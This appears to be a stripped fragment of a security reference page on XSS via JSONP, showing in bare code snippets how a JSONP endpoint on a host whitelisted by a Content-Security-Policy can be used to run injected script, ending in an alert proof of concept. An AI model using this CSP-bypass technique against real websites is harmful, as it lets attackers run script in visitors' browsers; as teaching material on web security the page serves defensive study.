XSS via JSONP
Last updated
Last updated
<script src="https://example.com/api?callback=myFunction"></script>myFunction({ "name": "Alice" });Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.trusted.com;<script src="https://apis.trusted.com/getUser?callback=cb"></script>cb({ "name": "evil" });<script src="https://apis.trusted.com/getUser?callback=cb"></script>alert({ "name": "evil" });